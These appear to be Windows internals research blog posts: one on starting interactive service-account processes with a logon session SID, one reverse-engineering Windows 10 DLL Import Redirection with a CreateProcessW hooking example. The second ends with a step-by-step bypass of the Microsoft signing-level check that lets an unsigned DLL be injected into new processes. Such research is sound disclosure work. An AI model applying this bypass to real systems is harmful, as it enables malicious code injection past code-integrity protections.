I'll save you the pain, the problem with running an interactive service process is the Local Service/Network Service token doesn't have access to the Desktop/Window Station/BaseNamedObjects etc for the session. It works for SYSTEM as that account is almost always granted full access to everything by virtue of either the SYSTEM or Administrators SID, however the low-privileged service accounts are not.

One way of getting around this would be to find every possible secured resource and add the service account. That's not really very reliable, miss one resource and it might still not work or it might fail at some indeterminate time. Instead we do what the OS does, we need to create the service token with the Logon Session SID which will grant us access to the session's resources.

First create a SYSTEM powershell command on the current desktop using the Start-Win32ChildProcess command. Next get the current session token with:

PS>  $sess = Get-NtToken -Session

We can print out the Logon Session SID now, for interest:

PS> $sess.LogonSid.Sid
Name                                     Sid
----                                     ---
NT AUTHORITY\LogonSessionId_0_41106165   S-1-5-5-0-41106165

Now create a Local Service token (or Network Service, or IUser, or any service account) using:

PS> $token = Get-NtToken -Service LocalService -AdditionalGroups $sess.LogonSid.Sid

You can now create an interactive process on the current desktop using:

PS> New-Win32Process cmd -Token $token -CreationFlags NewConsole

You should find it now works :-)

A command prompt, running whois and showing the use as Local Service.

Saturday, 8 February 2020

DLL Import Redirection in Windows 10 1909

While poking around in NTDLL the other day for some Chrome work I noticed an interesting sounding new feature, Import Redirection. As far as I can tell this was introduced in Windows 10 1809, although I'm testing this on 1909.

What piqued my interesting was during initialization I saw the following code being called:

NTSTATUS LdrpInitializeImportRedirection() {
    PUNICODE_STRING RedirectionDllName =     
    if (RedirectionDllName->Length) {
        PVOID Dll;
        NTSTATUS status = LdrpLoadDll(RedirectionDllName, 0x1000001, &Dll);
        if (NT_SUCCESS(status)) {
        // ...


The code was extracting a UNICODE_STRING from the RTL_USER_PROCESS_PARAMETERS block then passing it to LdrpLoadDll to load it as a library. This looked very much like a supported mechanism to inject a DLL at startup time. Sounds like a bad idea to me. Based on the name it also sounds like it supports redirecting imports, which really sounds like a bad idea.

Of course it’s possible this feature is mediated by the kernel. Most of the time RTL_USER_PROCESS_PARAMETERS is passed verbatim during the call to NtCreateUserProcess, it’s possible that the kernel will sanitize the RedirectionDllName value and only allow its use from a privileged process. I went digging to try and find who was setting the value, the obvious candidate is CreateProcessInternal in KERNELBASE. There I found the following code:

BOOL CreateProcessInternalW(...) {
    LPWSTR RedirectionDllName = NULL;
    if (!PackageBreakaway) {
        BasepAppXExtension(PackageName, &RedirectionDllName, ...);

    BasepCreateProcessParameters(&Params, ...);
    if (RedirectionDllName) {
        RtlInitUnicodeString(&Params->RedirectionDllName, RedirectionDllName);

    // ...


The value of RedirectionDllName is being retrieved from BasepAppXExtension which is used to get the configuration for packaged apps, such as those using Desktop Bridge. This made it likely it was a feature designed only for use with such applications. Every packaged application needs an XML manifest file, and the SDK comes with the full schema, therefore if it’s an exposed option it’ll be referenced in the schema.

Searching for related terms I found the following inside UapManifestSchema_v7.xsd:

<xs:element name="Properties">
      <xs:element name="ImportRedirectionTable" type="t:ST_DllFile" 

This fits exactly with what I was looking for. Specifically the Schema type is ST_DllFile which defined the allowed path component for a package relative DLL. Searching MSDN for the ImportRedirectionTable manifest value brought me to this link. Interestingly though this was the only documentation. At least on MSDN I couldn’t seem to find any further reference to it, maybe my Googlefu wasn’t working correctly. However I did find a Stack Overflow answer, from a Microsoft employee no less, documenting it *shrug*. If anyone knows where the real documentation is let me know.

With the SO answer I know how to implement it inside my own DLL. I need to define list of REDIRECTION_FUNCTION_DESCRIPTOR structures which define which function imports I want to redirect and the implementation of the forwarder function. The list is then exported from the DLL through a REDIRECTION_DESCRIPTOR structure as   __RedirectionInformation__. For example the following will redirect CreateProcessW and always return FALSE (while printing a passive aggressive statement):

BOOL WINAPI CreateProcessWForwarder(
    LPCWSTR lpApplicationName,
    LPWSTR lpCommandLine,
    LPSECURITY_ATTRIBUTES lpProcessAttributes,
    LPSECURITY_ATTRIBUTES lpThreadAttributes,
    BOOL bInheritHandles,
    DWORD dwCreationFlags,
    LPVOID lpEnvironment,
    LPCWSTR lpCurrentDirectory,
    LPSTARTUPINFOW lpStartupInfo,
    LPPROCESS_INFORMATION lpProcessInformation)
    printf("No, I'm not running %ls\n", lpCommandLine);
    return FALSE;

    { "api-ms-win-core-processthreads-l1-1-0.dll", "CreateProcessW"
                  &CreateProcessWForwarder },

extern "C" __declspec(dllexport) const REDIRECTION_DESCRIPTOR __RedirectionInformation__ =


I compiled the DLL, added it to a packaged application, added the ImportRedirectionTable Manifest value and tried it out. It worked! This seems a perfect feature for something like Chrome as it’s allows us to use a supported mechanism to hook imported functions without implementing hooks on NtMapViewOfSection and things like that. There are some limitations, it seems to not always redirect imports you think it should. This might be related to the mention in the SO answer that it only redirects imports directly in your applications dependency graph and doesn’t support GetProcAddress. But you could probably live with that,

However, to be useful in Chrome it obviously has to work outside of a packaged application. One obvious limitation is there doesn’t seem to be a way of specifying this redirection DLL if the application is not packaged. Microsoft could support this using a new Process Thread Attribute, however I’d expect the potential for abuse means they’d not be desperate to do so.

The initial code doesn’t seem to do any checking for the packaged application state, so at the very least we should be able to set the RedirectionDllName value and create the process manually using NtCreateUserProcess. The problem was when I did the process initialization failed with STATUS_INVALID_IMAGE_HASH. This would indicate a check was made to verify the signing level of the DLL and it failed to load.

Trying with any Microsoft signed binary instead I got STATUS_PROCEDURE_NOT_FOUND which would imply the DLL loaded but obviously the DLL I picked didn't export __RedirectionInformation__. Trying a final time with a non-Microsoft, but signed binary I got back to STATUS_INVALID_IMAGE_HASH again. It seems that outside of a packaged application we can only use Microsoft signed binaries. That’s a shame, but oh well, it was somewhat inconvenient to use anyway.

Before I go there are two further undocumented functions (AFAIK) the DLL can export.

BOOL __ShouldApplyRedirection__(LPWSTR DllName)

If this function is exported, you can disable redirection for individual DLLs based on the DllName parameter by returning FALSE.

BOOL __ShouldApplyRedirectionToFunction__(LPWSTR DllName, DWORD Index)

This function allows you to disable redirection for a specific import on a DLL. Index is the offset into the redirection table for the matched import, so you can disable redirection for certain imports for certain DLLs.

In conclusion, this is an interesting feature Microsoft added to Windows to support a niche edge case, and then seems to have not officially documented it. Nice! However, it doesn’t look like it’s useful for general purpose import redirection as normal applications require the file to be signed by Microsoft, presumably to prevent this being abused by malicious code. Also there's no trivial way to specify the option using CreateProcess and calling NtCreateUserProcess doesn't correctly initialize things like SxS and CSRSS connections.


Now if you’ve bothered to read this far, I might as well admit you can bypass the signature check quite easily. Digging into where the DLL loading fails we find the following code inside LdrpMapDllNtFileName:

if ((LoadFlags & 0x1000000) && !NtCurrentPeb()->IsPackagedProcess)
  status = LdrpSetModuleSigningLevel(FileHandle, 8);
  if (!NT_SUCCESS(status))
    return status;


If you look back at the original call to LdrpLoadDll you'll notice that it was passing flag 0x1000000, which presumably means the DLL should be checked against a known signing level. The check is also disabled if the process is in a Packaged Process through a check on the PEB. This is why the load works in a Packaged Application, this check is just disabled. Therefore one way to get around the check would be to just use a Packaged App of some form, but that's not very convenient. You could try setting the flag manually by writing to the PEB, however that can result in the process not working too well afterwards (at least I couldn't get normal applications to run if I set the flag).

What is LdrpSetModuleSigningLevel actually doing? Perhaps we can just bypass the check?

NTSTATUS LdrpSetModuleSigningLevel(HANDLE FileHandle, BYTE SigningLevel) {
    DWORD Flags;
    BYTE CurrentLevel;
    NTSTATUS status = NtGetCachedSigningLevel(FileHandle, &Flags, &CurrentLevel);
    if (NT_SUCCESS(status))
        status = NtCompareSigningLevel(CurrentLevel, SigningLevel);
    if (!NT_SUCCESS(status))
        status = NtSetCachedSigningLevel(4, SigningLevel, &FileHandle);
    return status;


The code is using a the NtGetCachedSigningLevel and NtSetCachedSigningLevel system calls to use the kernel's Code Integrity module to checking the signing level. The signing level must be at least level 8, passing in from the earlier code, which corresponds to the "Microsoft" level. This ties in with everything we know, using a Microsoft signed DLL loads but a signed non-Microsoft one doesn't as it wouldn't be set to the Microsoft signing level.

The cached signature checks have had multiple flaws before now. For example watch my UMCI presentation from OffensiveCon. In theory everything has been fixed for now, but can we still bypass it?

The key to the bypass is noting that the process we want to load the DLL into isn't actually running with an elevated signing level, such as Microsoft only DLLs or Protected Process. This means the cached image section in the SECTION_OBJECT_POINTERS structure doesn't have to correspond to the file data on disk. This is effectively the same attack as the one in my blog on Virtual Box (see section "Exploiting Kernel-Mode Image Loading Behavior").

Therefore the attack we can perform is as follows:

1. Copy unsigned Import Redirection DLL to a temporary file.
2. Open the temporary file for RWX access.
3. Create an image section object for the file then map the section into memory.
4. Rewrite the file with the contents of a Microsoft signed DLL.
5. Close the file and section handles, but do not unmap the memory.
6. Start a process specifying the temporary file as the DLL to load in the RTL_USER_PROCESS_PARAMETERS structure.
7. Profit?

Copy of CMD running with the CreateProcess hook installed.

Of course if you're willing to write data to the new process you could just disable the check, but where's the fun in that :-)